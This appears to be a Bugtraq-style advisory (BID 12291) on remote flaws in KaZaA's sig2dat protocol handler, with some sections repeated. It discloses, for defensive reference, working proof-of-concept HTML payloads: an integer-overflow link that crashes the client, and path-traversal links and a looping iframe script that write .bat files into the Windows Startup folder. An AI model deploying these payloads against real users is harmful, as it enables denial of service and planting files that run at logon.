Kazaa Sig2Dat Protocol Multiple Remote Vulnerabilities
BID:12291
Info
Kazaa Sig2Dat Protocol Multiple Remote Vulnerabilities
| Bugtraq ID: | 12291 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 17 2005 12:00AM |
| Updated: | Jan 17 2005 12:00AM |
| Credit: | "Rafel Ivgi, The-Insider" <[email protected]> is credited with discovery of this issue. |
| Vulnerable: |
KaZaA Lite KaZaA Lite 2.0.2 KaZaA Lite KaZaA Lite 2.0 KaZaA Lite KaZaA Lite 1.7.2 KaZaA KaZaA Media Desktop 3.0 KaZaA KaZaA Media Desktop 2.6.4 KaZaA KaZaA Media Desktop 2.0.2 KaZaA KaZaA Media Desktop 2.0 |
| Not Vulnerable: | |
Discussion
Kazaa Sig2Dat Protocol Multiple Remote Vulnerabilities
Multiple remote vulnerabilities reportedly affect KaZaA's Sig2Dat protocol functionality. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it in critical actions.
An attacker may leverage these issues to cause the affected application to crash, denying service to legitimate users, and to create files in arbitrary directories that are readable to the affected application.
Multiple remote vulnerabilities reportedly affect KaZaA's Sig2Dat protocol functionality. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it in critical actions.
An attacker may leverage these issues to cause the affected application to crash, denying service to legitimate users, and to create files in arbitrary directories that are readable to the affected application.
Exploit / POC
Kazaa Sig2Dat Protocol Multiple Remote Vulnerabilities
No exploit is required to leverage these issues. The following proof of concepts have been provided:
To crash the affected application:
<A HREF="sig2dat://%7CFile:dev-catz5%28.bin%7CLength:999999999999999999999999999%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK_HERE</A>
To create arbitrary files:
<A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start
Menu/Programs/Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK_HERE</A>
<script>
var i
for (i=1;i<10000;i++)
{
mylocation="<iframe src='sig2dat://%7CFile:../../../../../../Docume~1/All
Users
/Start
Menu/Programs/Startup/cool"+i+".bat%7CLength:373236528%20Bytes,364489KB%
7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/'></iframe>";
document.write(mylocation);
}
</script>
No exploit is required to leverage these issues. The following proof of concepts have been provided:
To crash the affected application:
<A HREF="sig2dat://%7CFile:dev-catz5%28.bin%7CLength:999999999999999999999999999%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK_HERE</A>
To create arbitrary files:
<A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start
Menu/Programs/Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK_HERE</A>
<script>
var i
for (i=1;i<10000;i++)
{
mylocation="<iframe src='sig2dat://%7CFile:../../../../../../Docume~1/All
Users
/Start
Menu/Programs/Startup/cool"+i+".bat%7CLength:373236528%20Bytes,364489KB%
7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/'></iframe>";
document.write(mylocation);
}
</script>
Solution / Fix
Kazaa Sig2Dat Protocol Multiple Remote Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Kazaa Sig2Dat Protocol Multiple Remote Vulnerabilities
References:
References:
- KaZaA Homepage (KaZaA)
- sig2dat Homepage (vlaibb)
- Kazaa Sig2Dat Protocol Remote Integer Overflow and Denial Of Service by creating ("Rafel Ivgi, The-Insider"
- Re: Kazaa Sig2Dat Protocol Remote Integer Overflow and Denial Of Service by crea ("Berend-Jan Wever"
- Re: Kazaa Sig2Dat Protocol Remote Integer Overflow and Denial Of Service by crea (Markus Kern